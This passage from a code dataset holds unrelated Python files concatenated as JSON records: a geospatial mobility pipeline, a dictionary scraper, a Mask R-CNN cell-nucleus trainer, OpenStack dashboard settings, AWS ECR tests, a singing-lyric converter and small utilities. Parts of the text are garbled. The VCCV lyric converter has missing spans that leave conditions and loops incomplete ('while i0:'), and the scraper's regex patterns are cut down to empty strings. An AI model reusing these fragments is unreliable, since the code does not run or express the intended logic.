node.next_node","sub_path":"deleteElement.py","file_name":"deleteElement.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179561162","text":"import datetime\n\nimport geopandas as gpd\nfrom Geospatial.Scraper import GeoScraper, BritishColumbia, Canada\n\n# Process mobility related indicators for elementslab\nregions = {\n 'Canada':\n {\n 'British Columbia': ['Capital Regional District', 'Metro Vancouver']\n }\n}\n\nfor key, value in regions.items():\n date_list = [str((datetime.datetime(2018, 5, 31) - datetime.timedelta(days=x)).date()) for x in range(30)]\n\n bc = BritishColumbia(cities=value['British Columbia'])\n country = Canada(provinces=[bc])\n\n country.update_databases(census=False) # StatsCan\n for city in bc.cities: city.update_databases(bound=False, net=False)\n\n windows = False\n if windows: bca_dir = '//nas.sala.ubc.ca/ELabs/50_projects/16_PICS/07_BCA data/'\n else: bca_dir = '/Volumes/ELabs/50_projects/16_PICS/07_BCA data/'\n\n bc.get_bc_transit(urls=['http://victoria.mapstrat.com/current/google_transit.zip',\n 'local'], run=False, down=False) # BC Transit\n bc.aggregate_bca_from_field(\n run=False, join=False, classify=False,\n inventory_dir=f'{bca_dir}170811_BCA_Provincial_Data/Inventory Information - RY 2017.csv',\n geodatabase_dir=f'{bca_dir}Juchan_backup/BCA_2017_roll_number_method/BCA_2017_roll_number_method.gdb')\n\n for city in bc.cities:\n scraper = GeoScraper(city=city)\n for date in date_list: scraper.public_transit(False, date) # Transit Land\n lda_gdf = gpd.read_file(city.gpkg, layer='land_dissemination_area')\n city.centrality(run=True, axial=True, layer='network_walk')\n city.centrality(run=True, osm=True, layer='network_drive')\n x_features = city.network_analysis(\n run=True,\n service_areas=[400, 800, 1600],\n sample_gdf=lda_gdf,\n aggregated_layers={\n 'network_axial': [\"closeness\", \"betweenness\", \"length\"],\n 'network_nodes': [\"closeness\", \"betweenness\"],\n 'network_cycle': ['length'],\n 'network_drive': [\"betweenness\"],\n 'network_transit': ['frequency'],\n 'land_assessment_fabric': [\"n_use\", \"YEAR_BUILT\", \"TOTAL_FINISHED_AREA\", \"GROSS_BUILDING_AREA\",\n \"NUMBER_OF_BEDROOMS\", \"NUMBER_OF_BATHROOMS\"],\n 'land_assessment_parcels': ['area_sqkm', 'n_size'],\n 'land_dissemination_area': ['Population, 2016', 'Population density per square kilometre, 2016',\n 'Total private dwellings, 2016']\n })\n city.p_values(\n df=lda_gdf,\n x_features=x_features,\n y_features=['walk', 'bike', 'drive', 'bus'])\n\nparcels = {\n \"BC\": \"https://pub.data.gov.bc.ca/datasets/4cf233c2-f020-4f7a-9b87-1923252fbc24/ParcelMapBCExtract.zip\"\n}\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"615106382","text":"import re\nfrom urllib.request import urlopen\ndef find(x):\n srch=str(x)\n word = x\n url = \"http://dictionary.reference.com/browse/\"+srch+\"?s=t\"\n x=urlopen(url)\n x=x.read()\n \n items=re.findall(b'',b'')\n m=re.findall(b'at Dictionary.com, a free online dictionary with pronunciation, synonyms and translation. Look it up now! 
\"/>',z)\n if m==[]:\n if z.startswith(b\"Get your reference question answered by Ask.com\"):\n return False\n else:\n remo1 = len(word) + len(' definition, ') \n remo2 = -len(' See more.\"/>')\n\n return (z[remo1:remo2].decode(\"utf-8\") )\n else:\n return False\n","sub_path":"definition.py","file_name":"definition.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"23874803","text":"\"\"\"\nMask R-CNN\nTrain and detect on the Cell dataset for nucleus detection\n\nWritten by Stefano Gatti\n\n------------------------------------------------------------\n\nUsage: run from command line\nParameters:\n # General\n command -> Either 'train' for the training, or 'test' for testing the network.\n # Training\n --dataset -> The folder of the dataset to use for training. Must be divided in 'train' and 'val' subfolders.\n --weights -> The location of the .h5 file to load a previous model or 'coco' to use the COCO model.\n --epochs -> The number of epochs to run training.\n --logs -> The folder where logs will be saved. Defaults to ./logs.\n # Testing\n --image -> The image to run detection on during testing. Use this or '--dir'.\n --dir -> The folder containing the images to run detection on during testing. Use this or '--image'.\n --channel_number -> The number of channels of the input images. Defaults to 3.\n --display_image -> Whether to display the result of testing ot not.\nExamples:\n # Training\n python CellNucleusDetection.py train --dataset=../datasets/DatasetGeneChannels --weights=../models/cellSegmentation_RPN_only/mask_rcnn_cell_0010.h5 --epochs=20\n # Testing\n python CellNucleusDetection.py test --dir=\"../datasets/DatasetGeneChannels/train\" --weights=\"../models/nucleiSegmentation_all/mask_rcnn_cell_0020.h5\"\n\"\"\"\n\n# Generic imports\nimport os\nimport re\nimport sys\nimport json\nimport time\nimport numpy as np\nimport skimage.draw\nfrom imgaug import augmenters as iaa\n\n# Define the root directory of the project\nROOT_DIR = os.path.abspath(\"../\")\nsys.path.append(ROOT_DIR)\n\n# Import local files\nfrom cell.CellConfiguration import CellConfigDefault\nfrom mrcnn import model as modellib, utils, visualize as viz\n\n############################################################\n# Global variables\n############################################################\nCOCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, \"mask_rcnn_coco.h5\")\nDEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n\n############################################################\n# Configuration\n############################################################\nclass CellConfigNuclei(CellConfigDefault):\n \"\"\"\n Specialization of the config file for the network that needs to detect the nuclei.\n In the future, this will include a constructor method to define dynamically the channel count.\n \"\"\"\n # Number of classes (including background)\n # We only need to detect the nuclei, so only 1 additional class\n NUM_CLASSES = 1 + 1\n\n # Number of color channels per image\n # Changing this requires other changes in the code. 
See the WIKI for more\n # details: https://github.com/matterport/Mask_RCNN/wiki\n # Right now we are using images with 2 genes\n IMAGE_CHANNEL_COUNT = 1 + 2\n\n # Image mean (RGB)\n # Must have length equal to IMAGE_CHANNEL_COUNT\n # Values could depend on brightness of layer\n MEAN_PIXEL = np.array([123.7, 116.8, 103.9])\n\n # Input image resizing\n # IMAGE_MIN_DIM is the size of the scaled shortest side\n # IMAGE_MAX_DIM is the maximum allowed size of the scaled longest side\n # Due to the large number of nuclei, the image must be heavily downscaled\n IMAGE_MIN_DIM = 512\n IMAGE_MAX_DIM = 512\n\n # Length of square anchor side in pixels\n RPN_ANCHOR_SCALES = (16, 32, 64, 128, 256)\n\n # Maximum number of ground truth instances and final detections\n # These must definitely be higher\n MAX_GT_INSTANCES = 600\n DETECTION_MAX_INSTANCES = 600\n\n # ROIs kept after tf.nn.top_k and before non-maximum suppression\n # May need adjusting due to high cell count\n PRE_NMS_LIMIT = 3000\n\n # ROIs kept after non-maximum suppression (training and inference)\n # May need adjusting due to high cell count\n POST_NMS_ROIS_TRAINING = 1000\n POST_NMS_ROIS_INFERENCE = 800\n\n QUADRANTS = [\"TL\", \"TR\", \"BL\", \"BR\", \"CC\"]\n\n\n############################################################\n# Dataset\n############################################################\nclass CellDatasetNuclei(utils.Dataset):\n\n def load_cell(self, dataset_dir, subset, quadrants):\n \"\"\"Load a subset of the Cell dataset.\n dataset_dir: Root directory of the dataset.\n subset: Subset to load: train or val\n \"\"\"\n # Add classes.\n # We have only one class: the nucleus of a cell.\n self.add_class(\"nucleus\", 1, \"nucleus\")\n\n # Train or validation dataset?\n assert subset in [\"train\", \"val\"]\n dataset_dir = os.path.join(dataset_dir, subset)\n\n # Load the annotations form the json file\n annotations = json.load(open(os.path.join(dataset_dir, \"via_mask_annotations_json.json\")))\n annotations = list(annotations.values()) # don't need the dict keys\n\n # Skip unannotated images\n annotations = [a for a in annotations if a['regions']]\n\n # Analyze the annotations to add images and ground truths.\n for a in annotations:\n # Load the polygons in [[x1, y1], ...] 
format\n polygons = [r['shape_attributes'] for r in a['regions'] if r[\"region_attributes\"][\"gene expression\"]]\n\n # Next, we need to load the image path and the image size\n # if the dataset becomes too big, having the values directly in the json becomes necessary\n image_path = os.path.join(dataset_dir, a['filename'])\n img = skimage.io.imread(image_path)\n height, width = img.shape[:2]\n q_height = height // 2\n q_width = width // 2\n\n for q in quadrants:\n if q == \"TL\":\n q_start_x, q_start_y = 0, 0\n elif q == \"TR\":\n q_start_x, q_start_y = q_width, 0\n elif q == \"BL\":\n q_start_x, q_start_y = 0, q_height\n elif q == \"BR\":\n q_start_x, q_start_y = q_width, q_height\n elif q == \"CC\":\n q_start_x, q_start_y = q_width // 2, q_height // 2\n self.add_image(\n \"nucleus\",\n image_id=a[\"filename\"],\n path=image_path,\n width=width, height=height,\n polygons=polygons,\n quadrant=(q_start_x, q_start_y, q_width, q_height))\n\n def load_mask(self, image_id):\n \"\"\"Generate instance masks for an image.\n Returns:\n masks: A bool array of shape [height, width, instance count] with\n one mask per instance.\n class_ids: a 1D array of class IDs of the instance masks.\n \"\"\"\n # If not a cell dataset image, delegate to parent class\n info = self.image_info[image_id]\n if info[\"source\"] != \"nucleus\":\n return super(self.__class__, self).load_mask(image_id)\n\n # Load the quadrant of the image\n height = info[\"height\"]\n width = info[\"width\"]\n q_start_x, q_start_y, q_width, q_height = info[\"quadrant\"]\n\n polygons = []\n for p in info[\"polygons\"]:\n all_x, all_y = p[\"all_points_x\"], p[\"all_points_y\"]\n if np.all(np.less(all_x, q_start_x)) \\\n or np.all(np.less(all_y, q_start_y)) \\\n or np.all(np.greater(all_x, q_start_x+q_width)) \\\n or np.all(np.greater(all_y, q_start_y+q_height)):\n continue\n polygons.append(p)\n\n # Compute the number of nuclei\n num_nuclei = len(polygons)\n\n # Define the class ids\n class_ids = np.ones(num_nuclei, dtype=np.uint8)\n\n # Set the masks for each instance\n mask = np.zeros([height, width, num_nuclei], dtype=np.uint8)\n for i, p in enumerate(polygons):\n rr, cc = skimage.draw.polygon(p[\"all_points_y\"], p[\"all_points_x\"])\n mask[rr, cc, i] = 1\n\n # Cut the mask to the quadrant\n final_mask = mask[q_start_y:q_start_y+q_height, q_start_x:q_start_x+q_width, :]\n\n # Return mask and class ID array\n return final_mask.astype(np.bool), class_ids\n\n def load_image(self, image_id):\n # If not a cell dataset image, delegate to parent class\n info = self.image_info[image_id]\n if info[\"source\"] != \"nucleus\":\n return super(self.__class__, self).load_mask(image_id)\n # Load image\n image = skimage.io.imread(self.image_info[image_id]['path'])\n # Load the quadrant info\n q_start_x, q_start_y, q_width, q_height = info[\"quadrant\"]\n # Slice the image to the quadrant\n image = image[q_start_y:q_start_y+q_height, q_start_x:q_start_x+q_width, :]\n return image\n\n def image_reference(self, image_id):\n \"\"\"Return the path of the image.\"\"\"\n info = self.image_info[image_id]\n if info[\"source\"] == \"nucleus\":\n return info[\"path\"]\n else:\n super(self.__class__, self).image_reference(image_id)\n\n\n############################################################\n# Training\n############################################################\ndef train(model, dataset, config, epochs):\n \"\"\"Train the model.\"\"\"\n\n # Training dataset\n dataset_train = CellDatasetNuclei()\n dataset_train.load_cell(dataset, \"train\", 
config.QUADRANTS)\n dataset_train.prepare()\n\n # Validation dataset\n dataset_val = CellDatasetNuclei()\n dataset_val.load_cell(dataset, \"val\", config.QUADRANTS)\n dataset_val.prepare()\n\n # Select the layers to train\n layers = \"heads\"\n\n # Define the augmentation of for the dataset\n augmentation = iaa.Sequential([\n iaa.Fliplr(0.5),\n iaa.Flipud(0.5)\n ])\n\n # Finally, train the model\n print(f\"\\n----Beginning training----\\n\")\n model.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=epochs,\n layers=layers,\n augmentation=augmentation)\n\n\n############################################################\n# Testing\n############################################################\ndef test(model, images_path, targets, do_display):\n tot_n = 0\n acc_n = 0\n time_n = 0\n\n for img_i, (image_path, target) in enumerate(zip(images_path, targets)):\n # Run model detection\n print(f\"Running on {image_path}\")\n img_start = time.time()\n\n # Read image\n input_image = skimage.io.imread(image_path)\n input_image = input_image[512:1546, 512:1546]\n\n # Detect cells\n r = model.detect([input_image], verbose=0)[0]\n\n # Print results of current image\n print(\"\\tTest results\")\n nuclei_num = len(r['class_ids'])\n tot_n += nuclei_num\n if target == 0:\n if nuclei_num == 1:\n nuclei_acc = 1\n else:\n nuclei_acc = 0\n else:\n nuclei_acc = nuclei_num / target\n acc_n += nuclei_acc\n print(f\"\\t\\tNuclei found: {nuclei_num}\\n\\t\\tAccuracy: {100 * nuclei_acc}%\")\n\n # Detection time\n runtime = time.time() - img_start\n time_n += runtime\n print(f\"\\tDetection time: {runtime}\")\n\n # Display the results\n if do_display:\n image = skimage.io.imread(re.sub(r\"/DatasetGeneChannels/\", \"/DatasetRGBChannels/\", image_path))\n colours = []\n for _ in r['class_ids']:\n colours.append((0., .5, 1.))\n viz.display_instances(image, boxes=r[\"rois\"], masks=r[\"masks\"], class_ids=r[\"class_ids\"],\n class_names=[\"background\", \"\"], colors=colours, figsize=(2048, 2048), show_bbox=False)\n\n print(f\"\\n\\n----Final report----\")\n print(f\"\\tTotal nuclei detected: {tot_n}\")\n print(f\"\\tAverage accuracy: {acc_n / len(targets)}\")\n print(f\"\\tAverage detection time: {time_n / len(targets)}\")\n\n\n############################################################\n# Main\n############################################################\nif __name__ == '__main__':\n import argparse\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n description='Train Mask R-CNN to detect cell nucleus in an image.')\n parser.add_argument(\"command\",\n metavar=\"\",\n help=\"'train' or 'test'\")\n parser.add_argument('--dataset', required=False,\n metavar=\"/path/to/cell/dataset/\",\n help='Directory of the Cell dataset for training.')\n parser.add_argument('--weights', required=True,\n metavar=\"/path/to/weights.h5\",\n help=\"Path to weights .h5 file or 'coco'.\")\n parser.add_argument('--logs', required=False,\n default=DEFAULT_LOGS_DIR,\n metavar=\"/path/to/logs/\",\n help='Logs and checkpoints directory (default=logs/).')\n parser.add_argument('--image', required=False,\n metavar=\"path or URL to image\",\n help='Image on which you detect nuclei.')\n parser.add_argument('--dir', required=False,\n metavar=\"path or URL to image\",\n help='Directory containing images on which you detect nuclei.')\n parser.add_argument('--channel_number', required=False,\n default=3, type=int,\n metavar=\"Number of channels in the input images\",\n help=\"Specifies the number of 
channels in the image.\")\n parser.add_argument('--display_image', required=False,\n default=False, type=bool,\n metavar=\"\",\n help=\"Specifies whether the results of the testing are visualized with an image.\")\n parser.add_argument('--epochs', required=False,\n default=10, type=int,\n metavar=\"\",\n help=\"Number of epochs for training the model.\")\n args = parser.parse_args()\n\n # Validate arguments\n if args.command == \"train\":\n assert args.dataset, \"Argument --dataset is required for training\"\n elif args.command == \"test\":\n assert args.image or args.dir, \"Provide --image or --video to apply color splash\"\n\n # Load the configuration\n if args.command == \"train\":\n config = CellConfigNuclei()\n else:\n class InferenceConfig(CellConfigNuclei):\n # Set batch size to 1 since we'll be running inference on\n # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n\n config = InferenceConfig()\n config.display()\n\n # Create model\n if args.command == \"train\":\n model = modellib.MaskRCNN(mode=\"training\", config=config,\n model_dir=args.logs)\n else:\n model = modellib.MaskRCNN(mode=\"inference\", config=config,\n model_dir=args.logs)\n\n # Select weights file to load\n if args.weights.lower() == \"coco\":\n weights_path = COCO_WEIGHTS_PATH\n # Download weights file\n if not os.path.exists(weights_path):\n utils.download_trained_weights(weights_path)\n elif args.weights.lower() == \"last\":\n # Find last trained weights\n weights_path = model.find_last()\n else:\n weights_path = args.weights\n\n # Load weights\n print(\"Loading weights \", weights_path)\n if args.weights.lower() == \"coco\":\n # Exclude the last layers because they require a matching\n # number of classes\n model.load_weights(weights_path, by_name=True, exclude=[\n \"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n \"mrcnn_bbox\", \"mrcnn_mask\"])\n else:\n model.load_weights(weights_path, by_name=True)\n\n # Train or test\n if args.command == \"train\":\n train(model=model, dataset=args.dataset, config=config, epochs=args.epochs)\n elif args.command == \"test\":\n # Load the image and corresponding ground truths\n if args.image:\n # Load the annotation file\n dir = os.path.split(args.image)[0]\n print(f\"\\tLoading images from the folder {dir}\")\n a = json.load(open(os.path.join(dir, \"via_mask_annotations_json.json\")))\n a = list(a.values())\n\n targets = []\n for file in a:\n if a[\"filename\"] != os.path.split(args.image)[1]:\n continue\n n = len(file[\"regions\"])\n targets.append(n)\n images = [args.image]\n else:\n # Load the annotation file\n dir = args.dir\n print(f\"\\tLoading images from the folder {dir}\")\n a = json.load(open(os.path.join(dir, \"via_mask_annotations_json.json\")))\n a = list(a.values())\n\n # Load the image names\n images = [os.path.join(dir, x[\"filename\"]) for x in a if x[\"regions\"]]\n print(f\"\\tImages found: \")\n print(\"\\n\".join([os.path.split(x)[1] for x in images]))\n\n targets = []\n for file in a:\n n = len(file[\"regions\"])\n targets.append(n)\n\n test(model=model, images_path=images, targets=targets, do_display=args.display_image)\n","sub_path":"cell/CellQuadrantDetection.py","file_name":"CellQuadrantDetection.py","file_ext":"py","file_size_in_byte":17467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"25423337","text":"import os\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nPROD = False\nUSE_SSL = False\n\nLOCAL_PATH = 
os.path.dirname(os.path.abspath(__file__))\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': '/var/lib/openstack-dashboard/dashboard_openstack.sqlite3',\n 'TEST_NAME': os.path.join(LOCAL_PATH, 'test.sqlite3'),\n },\n}\n\n# We recommend you use memcached for development; otherwise after every reload\n# of the django development server, you will have to login again. To use\n# memcached set CACHE_BACKED to something like 'memcached://127.0.0.1:11211/' \n#CACHE_BACKEND = 'locmem://'\nCACHE_BACKEND = 'memcached://127.0.0.1:11211/'\n\n# Send email to the console by default\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n# Or send them to /dev/null\n#EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\n# Configure these for your outgoing email host\n# EMAIL_HOST = 'smtp.my-company.com'\n# EMAIL_PORT = 25\n# EMAIL_HOST_USER = 'djangomail'\n# EMAIL_HOST_PASSWORD = 'top-secret!'\n\nHORIZON_CONFIG = {\n 'dashboards': ('nova', 'syspanel', 'settings',),\n 'default_dashboard': 'nova',\n 'user_home': 'dashboard.views.user_home',\n}\n\nOPENSTACK_HOST = \"127.0.0.1\"\nOPENSTACK_KEYSTONE_URL = \"http://%s:5000/v2.0\" % OPENSTACK_HOST\n# FIXME: this is only needed until keystone fixes its GET /tenants call\n# so that it doesn't return everything for admins\nOPENSTACK_KEYSTONE_ADMIN_URL = \"http://%s:35357/v2.0\" % OPENSTACK_HOST\nOPENSTACK_KEYSTONE_DEFAULT_ROLE = \"Member\"\n\n# The number of Swift containers and objects to display on a single page before\n# providing a paging element (a \"more\" link) to paginate results.\nSWIFT_PAGINATE_LIMIT = 1000\n\n# Configure quantum connection details for networking\nQUANTUM_ENABLED = False\nQUANTUM_URL = '%s' % OPENSTACK_HOST\nQUANTUM_PORT = '9696'\nQUANTUM_TENANT = '1234'\nQUANTUM_CLIENT_VERSION='0.1'\n\n# If you have external monitoring links, eg:\n# EXTERNAL_MONITORING = [\n# ['Nagios','http://foo.com'],\n# ['Ganglia','http://bar.com'],\n# ]\n\nLOGGING = {\n 'version': 1,\n # When set to True this will disable all logging except\n # for loggers specified in this configuration dictionary. 
Note that\n # if nothing is specified here and disable_existing_loggers is True,\n # django.db.backends will still log unless it is disabled explicitly.\n 'disable_existing_loggers': False,\n 'handlers': {\n 'null': {\n 'level': 'DEBUG',\n 'class': 'django.utils.log.NullHandler',\n },\n 'console': {\n # Set the level to \"DEBUG\" for verbose output logging.\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n },\n 'log_file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': '/var/log/openstack-dashboard/openstack_dashboard.log',\n },\n },\n 'loggers': {\n # Logging from django.db.backends is VERY verbose, send to null\n # by default.\n 'django.db.backends': {\n 'handlers': ['null'],\n 'propagate': False,\n },\n 'horizon': {\n 'handlers': ['log_file'],\n 'propagate': False,\n },\n 'novaclient': {\n 'handlers': ['log_file'],\n 'propagate': False,\n },\n 'keystoneclient': {\n 'handlers': ['log_file'],\n 'propagate': False,\n },\n 'nose.plugins.manager': {\n 'handlers': ['log_file'],\n 'propagate': False,\n }\n }\n}\n\nLOGIN_URL = '/dashboard/auth/login'\n","sub_path":"redhat/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389399319","text":"import pandas as pd\nimport numpy as numpy\nimport sqlite3\n \nconn = sqlite3.connect(r'C:\\temp\\loc_post.db')\ncursor = conn.cursor()\n\nPDB = cursor.execute(\"SELECT * FROM position where nearestBranch is null\" )\n\nrows = cursor.fetchall()\nfor row in rows:\n print(row)\n\nconn.commit()\nconn.close()","sub_path":"Study_9th_Calulation_distance/4.dbQuery.py","file_name":"4.dbQuery.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"331316442","text":"import sys\nfilepath = '/input/records.json' \n# order = {}\n# line_item = {}\n# def create(check, key, temp):\n# print(check)\n# if(check == '\"order\"'):\n# # print(\"true\")\n# order[key] = [_ for _ in temp]\n# else:\n# # print(\"false\")\n# if(key in line_item):\n# line_item[key].append([_ for _ in temp])\n# else:\n# line_item[key] = [_ for _ in temp]\n\n\n\nwith open(filepath) as fp: \n line = fp.readline()\n while line:\n line = line[1:-2]\n temp = line.split(\", \")\n # print(temp[0].strip())\n check = temp[0].strip()\n key = temp[1].strip()\n print(check+\"+\", temp)\n line = fp.readline()\n\n\n\n\n\n\n # cnt = 1\n # while line:\n # # print(\"Line {}: {}\".format(cnt, line.strip()))\n # line = fp.readline()\n # cnt += 1","sub_path":"Module 7/Assignment 1/mapper2.py","file_name":"mapper2.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"87773957","text":"from util.sql_source import SqlSource\nfrom util.solr_source import SolrSource\nfrom datetime import datetime\nfrom nltk.corpus import stopwords\n\nclass Reviews(SqlSource, SolrSource):\n\n def __init__(self, sql_connection_str, solr_server, random_seed):\n SqlSource.__init__(self, sql_connection_str, random_seed)\n SolrSource.__init__(self, solr_server)\n\n def termsByAsin(self, asin):\n return self._execSolrQuery(\n 'asin:\"{}\"'.format(asin),\n **{\n 'facet':'true',\n 'facet.field':'reviewText'\n })\n\n\n\n def asinByTerms(self, terms):\n return self._execSolrQuery(\n 'reviewText:\"{}\"'.format(terms),\n **{\n 'facet': 'true',\n 'facet.field': 'asin'\n 
})","sub_path":"data_exploration/api/reviews.py","file_name":"reviews.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"390659667","text":"from unittest import TestCase\n\nfrom mock import patch, MagicMock\n\nfrom aws_boto3 import ecr\n\n\nclass AwsBoto3EcrTest(TestCase):\n\n @patch('aws_boto3.ecr.get_client')\n @patch('aws_boto3.ecr.get_repo_attr', return_value=False)\n def test_ecr_ensure_repo(self, get_repo_mock, client_mock):\n client_mock.return_value = MagicMock()\n client_mock.return_value.create_repository = MagicMock()\n client_mock.return_value.create_repository.return_value = {'repository': {'repositoryArn': 'newrepo'}}\n response = ecr.ecr_ensure_repo('foo')\n self.assertEquals(response, {'repositoryArn': 'newrepo'})\n\n @patch('aws_boto3.ecr.get_client')\n @patch('aws_boto3.ecr.get_repo_attr', return_value='12345')\n def test_ecr_ensure_repo_exists(self, get_repo_mock, client_mock):\n response = ecr.ecr_ensure_repo('foo')\n self.assertEquals(response, {'repositoryArn': '12345'})\n\n @patch('aws_boto3.ecr.get_client')\n @patch('aws_boto3.ecr.get_repo_attr')\n def test_ecr_absent_repo(self, get_repo_mock, client_mock):\n client_mock.return_value = MagicMock()\n client_mock.return_value.delete_repository = MagicMock()\n client_mock.return_value.delete_repository.return_value = True\n response = ecr.ecr_absent_repo('foo')\n self.assertEquals(response, {'RepositoryAbsent': 'foo'})\n\n @patch('aws_boto3.ecr.get_client')\n @patch('aws_boto3.ecr.get_repo_attr', return_value=False)\n def test_ecr_absent_repo_not_exists(self, get_repo_mock, client_mock):\n client_mock.return_value = MagicMock()\n client_mock.return_value.delete_repository = MagicMock()\n response = ecr.ecr_absent_repo('deleted')\n self.assertEquals(response, {'RepositoryAbsent': 'deleted'})\n","sub_path":"tests/test_ecr.py","file_name":"test_ecr.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610763173","text":"import os\nimport pickle\nScoreDraftPath= os.path.dirname(__file__)\n\nlyricSet=set()\nlyricPrefixSet=set()\nvowelSet={'a','e','i','o','u','E','9','3','@','A','I','O','8','Q','6','x','&','1','0'}\nvowelPrefixSet=set()\n\natomicSet={'ch','dh','sh','th','zh','ng','Ang','dr','tr'}\n\ndef BuildLyricSet():\n\twith open(ScoreDraftPath+'/UTAUVoice/Yami/D4/oto.ini', 'r') as f:\n\t\twhile True:\n\t\t\tline = f.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tp1 = line.find('=')\n\t\t\tif p1==-1:\n\t\t\t\tcontinue\n\t\t\tfn=line[0:p1-4]\n\t\t\tp2 = line.find(',',p1)\n\t\t\tif p2==-1:\n\t\t\t\tcontinue\n\t\t\tlyric=line[p1+1:p2]\n\t\t\tif lyric=='':\n\t\t\t\tlyric=fn\n\t\t\tlyricSet.add(lyric)\n\twith open(ScoreDraftPath+'/VCCVLyricSet.data','wb') as f:\n\t\tpickle.dump(lyricSet,f)\n\ndef LoadLyricSet():\n\twith open(ScoreDraftPath+'/VCCVLyricSet.data','rb') as f:\n\t\tglobal lyricSet\n\t\tlyricSet=pickle.load(f)\n\n#BuildLyricSet()\nLoadLyricSet()\n\nfor lyric in lyricSet:\n\tfor i in range(len(lyric)):\n\t\tif lyric[i]==' ':\n\t\t\tcontinue\n\t\tlyricPrefixSet.add(lyric[0:i+1])\n\nfor vowel in vowelSet:\n\tfor i in range(len(vowel)):\n\t\tvowelPrefixSet.add(vowel[0:i+1])\n\ndef VCCVEnglishConverter(inList):\n\tinList_a=[]\n\tfor inLyric in inList:\n\t\tlyric_a=[]\n\t\ti=0\n\t\twhile i0:\n\t\t\tif prefix=='-' or cur[1]>0 or vowelMap[cur[0]][0]==0:\n\t\t\t\ttest_seg = prefix + inList_a[cur[0]][cur[1]]\n\t\t\t\tif test_seg 
in lyricPrefixSet:\n\t\t\t\t\tbreak\n\n\t\t\ttest_seg = prefix +' '+inList_a[cur[0]][cur[1]]\n\t\t\tif test_seg in lyricPrefixSet:\n\t\t\t\tbreak\n\n\t\t\tprefix=prefix[1:len(prefix)]\n\n\t\t#pass2\n\t\tnextStart=cur[:]\n\t\tseg=''\n\t\tisVowel=False\n\n\t\twhile True:\n\t\t\tseg=''\n\t\t\tlastSeg=prefix[:]\n\t\t\tcur2=cur[:] \n\n\t\t\tisVowel=False\n\n\t\t\twhile True:\n\t\t\t\tspaceMust=False\n\t\t\t\tnewChar=''\n\t\t\t\tif not (cur2[0]0:\n\t\t\t\t\t\tspaceMust=True\n\n\t\t\t\tif lastSeg=='' and cur[0]=vowelMap[cur[0]][0] and cur[1]=vowelMap[cur[0]][0] and cur[1]=len(inList_a[cur2[0]]):\n\t\t\t\t\tcur2[0]+=1\n\t\t\t\t\tcur2[1]=0\t\n\t\t\t\t\tif seg!='':\n\t\t\t\t\t\tbreak\t\t\t\n\n\n\t\t\tif len(seg)>0 or len(prefix)==0:\n\t\t\t\tbreak\n\t\t\t\n\t\t\tprefix=prefix[1:len(prefix)]\t\n\n\t\tif len(seg)>0:\n\t\t\toutList+=[(seg, iIn, isVowel)]\n\n\t\tif not (cur[0]=len(inList_a[cur[0]]):\n\t\t\tcur[0]+=1\n\t\t\tcur[1]=0\n\n\t\tpos=nextStart[:]\n\t\tprefix=''\n\t\twhile pos[0]=len(inList_a[pos[0]]):\n\t\t\t\tpos[0]+=1\n\t\t\t\tpos[1]=0\n\n\tret=[]\n\tsyllable=()\n\tiSyllable=0\n\n\tfor i in range(len(outList)):\n\t\toutItem=outList[i]\n\t\tif outItem[1]!=iSyllable:\n\t\t\tret+=[syllable]\n\t\t\tsyllable=()\n\t\t\tiSyllable=outItem[1]\n\t\tweight=0.1\n\t\tif outItem[2]:\n\t\t\tweight=0.4\n\t\tsyllable+=(outItem[0], weight, outItem[2])\n\n\tret+=[syllable]\n\n\t#print(ret)\n\n\treturn ret\n","sub_path":"ScoreDraft/VCCVEnglishConverter.py","file_name":"VCCVEnglishConverter.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"308277305","text":"\ndef is_inside(point, rec):\n if rec[0] < point[0] < rec[0] + rec[2] and rec[1] < point[1] < rec[1] + rec[3]:\n return True\n else:\n return False\n\n# Test: If the starting point is inside the rectangle and the return value is True,\n# or the starting point is outside the rectangle and the return value is False,\n# the function will be correct.\n\n#Otherwise, the function has a bug\n\nfrom turtle import*\n\nlist1 = [200, 120]\nlist2 = [210, -60, 100, 200]\nprint(is_inside(list1, list2))\n\nshape()\npenup()\ngoto(list1)\npendown()\n\ngoto(list2[:2])\ngoto(list2[0] + list2[2], list2[1])\ngoto(list2[0] + list2[2], list2[1] + list2[3])\ngoto(list2[0], list2[1] + 